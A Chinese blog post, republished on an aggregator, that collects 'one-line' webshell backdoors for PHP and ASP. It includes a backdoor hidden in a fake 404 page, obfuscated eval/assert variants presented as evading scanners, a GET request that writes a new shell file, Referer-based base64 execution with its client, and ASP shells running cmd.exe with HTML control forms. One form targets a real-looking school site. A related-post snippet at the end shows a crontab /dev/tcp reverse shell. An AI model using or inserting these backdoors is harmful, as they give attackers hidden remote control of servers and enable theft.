2. 程式人生 > >表弟讓整理的各種一句話後門= =

表弟讓整理的各種一句話後門= =

阿新 發佈:2017-06-09
信息安全 php asp

php

利用404頁面隱藏PHP小馬

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html><[email protected]
*/_replace("/[pageerror]/e",$_POST[‘error‘],"saft");header(‘HTTP/1.1 404 Not Found‘);?>

404頁面是網站常用的文件一般建議好後很少有人會去對它進行檢查修改這時我們可以利用這一點進行隱藏後門。

無特征隱藏PHP一句話

<?php
session_start();$_POST[‘code‘] && $_SESSION[‘theCode‘] = trim($_POST[‘code‘]);$_SESSION[‘theCode‘]&&preg_replace(‘\‘a\‘eis‘,‘e‘.‘v‘.‘a‘.‘l‘.‘(base64_decode($_SESSION[\‘theCode\‘]))‘,‘a‘);

將$_POST[‘code‘]的內容賦值給$_SESSION[‘theCode‘]然後執行$_SESSION[‘theCode‘]亮點是沒有特征碼。用掃描工具來檢查代碼的話是不會報警的達到目的了。

超級隱蔽的PHP後門

<?php $_GET[a]($_GET[b]);?>

僅用GET函數就構成了木馬

利用方法

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

執行後當前目錄生成c.php一句話木馬當傳參a為eval時會報錯木馬生成失敗為assert時同樣報錯但會生成木馬真可謂不可小視簡簡單單的一句話被延伸到這般應用。

層級請求編碼運行PHP後門
此方法用兩個文件實現文件1

<?php//1.phpheader(‘Content-type:text/html;charset=utf-8‘);parse_str($_SERVER[‘HTTP_REFERER‘], $a);if(reset($a) == ‘10‘ && count($a) == 9) {   eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));}

文件2

<?php//2.phpheader(‘Content-type:text/html;charset=utf-8‘);//要執行的代碼$code = <<<CODE
phpinfo();CODE;//進行base64編碼$code = base64_encode($code);//構造referer字符串$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";//後門url$url = ‘http://localhost/test1/1.php‘;$ch = curl_init();$options = array(    CURLOPT_URL => $url,    CURLOPT_HEADER => FALSE,    CURLOPT_RETURNTRANSFER => TRUE,    CURLOPT_REFERER => $referer);curl_setopt_array($ch, $options);echo curl_exec($ch);

三個變形的一句話PHP木馬
第一個

<?php ($_=@$_GET[2]).@$_($_POST[1])?>

在菜刀裏寫http://site/1.php?2=assert密碼是1

第二個

<?php
$_="";$_[+""]=‘‘;$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?><?php ${‘_‘.$_}[‘_‘](${‘_‘.$_}[‘__‘]);?>

在菜刀裏寫http://site/2.php?_=assert&__=eval($_POST[‘pass‘]) 密碼是pass。如果你用菜刀的附加數據的話更隱蔽或者用其它註射工具也可以因為是post提交的。

第三個

($b4dboy = $_POST[‘b4dboy‘]) && @preg_replace(‘/ad/e‘,[email protected]_rot13(‘riny‘).‘($b4dboy)‘, ‘add‘);

str_rot13(‘riny’)即編碼後的eval完全避開了關鍵字又不失效果讓人吐血

最後列幾個高級的PHP一句話木馬後門

1、$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$hh("/[discuz]/e",$_POST[‘h‘],"Access");//菜刀一句話2、$filename=$_GET[‘xbid‘];include ($filename);//危險的include函數直接編譯任何文件為php格式運行3、$reg="c"."o"."p"."y";$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);//重命名任何文件4、$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$gzid("/[discuz]/e",$_POST[‘h‘],"Access");//菜刀一句話5、include ($uid);//危險的include函數直接編譯任何文件為php格式運行POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif//gif插一句話6、典型一句話程序後門代碼<?php eval_r($_POST[sb])?>程序代碼<?php @eval_r($_POST[sb])?>//容錯代碼程序代碼<?php assert($_POST[sb]);?>//使用lanker一句話客戶端的專家模式執行相關的php語句程序代碼<?$_POST[‘sa‘]($_POST[‘sb‘]);?>程序代碼<?$_POST[‘sa‘]($_POST[‘sb‘],$_POST[‘sc‘])?>程序代碼<[email protected]_replace("/[email]/e",$_POST[‘h‘],"error");?>//使用這個後,使用菜刀一句話客戶端在配置連接的時候在"配置"一欄輸入程序代碼<O>[email protected]_r($_POST1);</O>程序代碼<script language="php">@eval_r($_POST[sb])</script>//繞過<?限制的一句話

綜上

asp

ASP一句話木馬大全

<%eval request("MH")%>

<%execute request("MH")%>

<%execute(request("MH"))%>

<%If Request("MH")<>""Then Execute(Request("MH"))%>

<%if request("MH")<>""thensession("MH")=request("MH"):end if:ifsession("MH")<>"" then executesession("MH")%>

<SCRIPT language=VBScriptrunat="server">executerequest("MH")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval_r(Request.Item["MH"],"unsafe");%>


1asp一句話木馬
一句話木馬 服務器端
帶驗證:
——————————————cmd.asp————————————————
<%
if request("authkey")="pic16f873a" then
%>
<textarea readonly cols=80rows=25>
<%response.writeserver.createobject("wscript.shell").exec("cmd.exe /c"&request("cmd")).stdout.readall%>
</textarea>
<%
end if
%>

帶驗證 客戶端
——————————————cmd.html————————————————
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frmtarget=_blank>
Host:<input type=text name=act size=65value="http://">
<br>
<br>
Cmd :<input type=text name=cmd size=65value="cmd">
<br>
<br>
<input type=hidden name=authkeyvalue="pic16f873a">
<Input name=Send
onclick="Javascipt:frm.action=document.frm.act.value;
frm.submit();"
type=button value="Send Command">
</FORM>
</div>



目錄瀏覽

服務器端
_________________________________________
<%
if request("authkey")="pic16f873a" then
szPara = Request.Form("path")
set shell=server.createobject("shell.application")
set dir1=shell.namespace(szPara)
set diritems=dir1.items

for each iii in diritems
response.write iii.path & "<fontcolor=blue>[" & iii.size&"]</font><br>"
next
end if
%>
_________________________________________
客戶端
__________________________________________
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frmtarget=_blank>
Host:<input type=text name=act size=65value="http://">
<br>
<br>
Path:<input type=text name=path size=65value="C:\">
<br>
<br>
<input type=hidden name=authkeyvalue="pic16f873a">
<Input name=Sendonclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"
type=button value="Send Command">

</FORM>
</div>


一句話木馬客戶端源文件

裏面涉及到一些腳本知識我就只講解一下功能和簡單註釋不詳細講了大家只要註意幾個註意點就行了
***********************************************************

<form action=http://cjy.xjife.edu.cn/news/ebook/db/ebook.aspmethod=post>
//"action="後面是需要修改的以asp命名的數據庫的提交地址
//這個標簽的意思是建立一個表單 以post方式提交給連接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp處理

<textarea name=value cols=120 rows=10width=45>
//這裏的value值根據服務端<%executerequest("value")%>中value而設定
//可以自行修改成<%executerequest("p")%>相應這裏的value值也必須改為p

setlP=server.createObject("Adodb.Stream")//建立流對象有了對象才可以使用它固有的屬性和方法
lP.Open //打開
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字體標準
lP.writetext request("joeving") //取得木馬內容 參數joeving可以自己定義但必須和下面的name=joeving相對應
lP.SaveToFile server.mappath("wei.asp"),2
//將木馬內容以覆蓋文件的方式寫入wei.asp
//2就是已覆蓋的方式這裏的wei.asp也是可以自己定義的如定義成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //關閉對象
set lP=nothing //釋放對象
response.redirect "wei.asp"//轉向生成的wei.asp和上面的wei.asp相對應也就是你熟悉的asp木馬登陸界面
</textarea>
//這段程序的功能利用插入到數據庫文件的<%executerequest("value")%>這段代碼執行第一個textarea中的內容並將添加的木馬內容寫入和指向wei.asp這樣就相當於在服務器上建立了個asp木馬文件這樣就可以取得webshell了

<textarea name=joeving cols=120 rows=10width=45>添入生成木馬的內容/textarea><BR><center><br>
//這段標簽是你用來添加木馬內容用的

<input type=submit value=提交>
</form>

***********************************************************

//程序的主要框架是
<form>
<textarea></textarea>//取得木馬內容並用無組件上傳技術在服務器端創建asp木馬文件並顯示
<textarea></textarea>//添加木馬內容用的
</form>
其實都是些很簡單的一些html和asp

本文出自 “安陌離” 博客,謝絕轉載!

表弟讓整理的各種一句話後門= =

相關推薦

表弟整理各種一句話後門= =

信息安全 php asp php 利用404頁面隱藏PHP小馬<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</titl

各種一句話木馬大全

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/84206143 <%eval request("c")%> <%execute request("c")%> <%execute(request

crontab一句話後門分析

正常版本 (crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/127.0.0.1/8888;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|cro

那些強悍的PHP一句話後門

強悍的PHP一句話後門 常用一: <?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).ch

如何網絡卡後門搞死一個系統,你知道網絡卡是個多麼厲害的角色

最近本人在FPGA上做開發,課題是乙太網控制器IP核。 發現這裡面可以嵌入一個強大的後門。 如果你知道乙太網的工作過程,就好懂多了。 乙太網協議如此要求,首先,網絡卡會接受資料,無論是發給誰的。第二步,然後判斷是不是自己MAC地址的,如果不是就扔掉。第三步,如果是自己MAC

PHP網站掃描一句話後門WebShell指令碼原始碼

$matches = array( '/mb_ereg_replace\([\'\*\s\,\.\"]+\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\[[\'\"].*?[\'\"][\]][\,\s\'\"]+e[\'\"]'/is, '/pre

PHP一句話後門

1、利用404頁面隱藏一句話 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title>

PHP一句話後門過狗姿勢萬千之後門構造與隱藏

第二章節主要帶給大家一些後門構造思路,與安全狗檔案特徵檢測的機制。 另外強調一下,這篇文章需要大家對於php有一定的認識。 本章節分為三大部分,第一部分針對初級,分析菜刀php程式碼的執行過程,較基礎;第二部分主要總結一些可以利用的後門姿勢,這部分我主要給大家分享一些蒐集

一句話後門中eval和assert的區別

eval函式中引數是字元,如: eval('echo 1;'); assert函式中引數為表示式 (或者為函式),如: assert(phpinfo()) assert(eval('echo 1;')); 直接傳遞普通程式碼是無法執行的,如:assert('

好比你有一個衣櫥,裡面塞滿了各種襯衫,你會怎麼整理這些襯衫,好你以後找襯衫的時候容易些 - Google 谷歌 百

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

各種調研投資方

通知 公司 本周 繼續 上市 什麽 .com 朋友 產生 做各種調研讓投資方做各種調研讓投資方做各種調研讓投資方做各種調研讓投資方做各種調研讓投資方做各種調研讓投資方做各種調研讓投資方做各種調研讓投資方做各種調研讓投資方做各種調研讓投資方做各種調研讓投資方做各種調研讓投資方

Oracle 數據庫啟動與關閉 各種方式詳解整理

歸檔模式 tro 需求 acl 提交 管理操作 edi 存在 datafile 概述 只有具備sysdba和sysoper系統特權的用戶才能啟動和關閉數據庫。 在啟動數據庫之前應該啟動監聽程序,否則就不能利用命令方式來管理數據庫,包括啟動和關閉數據庫。 雖然數據庫正常運行,

整理的最新WebSHell (php過狗一句話,過狗菜刀,2016過狗一句話,2016php免殺一句話)

一句話木馬中國菜刀下載,基於原版中國菜刀優化版20160309.下載地址:http://download.csdn.net/detail/settoken/9457567https://pan.baidu.com/s/1jHoJxHWChina chopperhttps://pan.baidu.com/s/1

【C語言程序】用戶輸入一句話,輸出這句話中每個單詞含有多少個字母

get mage 一句話 printf png es2017 urn bsp can #include <stdio.h>#define N 100 //宏定義,用N表示100 int main(int argc, char *argv[]) { int i

花卉各種病蟲害大全——葉斑病 WYF收集整理

葉斑病 葉斑病是真菌病害的一種,很多花友希望可以查閱到葉斑病圖片,依次來對比自己家的花草病害的癥狀,本文收集整理了一些常見花草葉斑病圖片,希望能對花友有所幫助。1、發財樹葉斑病2、廣玉蘭葉斑病3、金葉女貞葉斑病4臘梅葉斑病5萬年青葉斑病6、文殊蘭葉斑病7雞冠花葉斑病8辣椒細菌性葉斑病9天竺葵10茉莉花葉斑病葉

各種安全思維導圖整理免費送~

get width 免費 all lin 作者 -s 整理 ref 本文作者:i春秋作家——zusheng 不局限於上面 項目地址:https://github.com/phith0n/Mind-Map 免費課程學習地址:https://bbs.ichunqiu.

Android 能你少走彎路的幹貨整理

國內 dial studio 不為 司機 理論 藝術探索 img 郭霖 本篇文章已授權為微信公眾號 code小生 發布 前言 學習 Android 也有一段時間了,其中也踩了不少坑,現在回想起來,就會有種感慨:「如果當時有人跟我說這些就好了」,這便是我寫這篇文章的目的。我

IMDb、爛番茄、MTC、各種電影行業評分名字整理

nbsp 影評 追蹤 height mage rank 打了 required 不同 這篇不是技術文章,就是對總是看到但是不知道具體是什麽的一些電影名詞、評分、來源,學習一下。 IMDb 互聯網電影資料庫(Internet Movie Database,簡稱IMDb

hadoop 各種概念整理

保存文件 replica 基本 linux中 最小 朋友 字節 並發訪問 尋址 Hadoop Hadoop實現了一個分布式文件系統(Hadoop Distributed File System),簡稱HDFS。 HDFS有高容錯性的特點,並且設計用來部署在低廉的(low

小程序各種功能代碼片段整理---持續更新

事先 rdo then num () program new js文件 輪播 小程序註意事項:wxml的引號內的花括號旁邊不要加多余的空格,有可能會影響js代碼 源碼下載:https://github.com/ybx13579/xiaochengxu-jizan 目錄引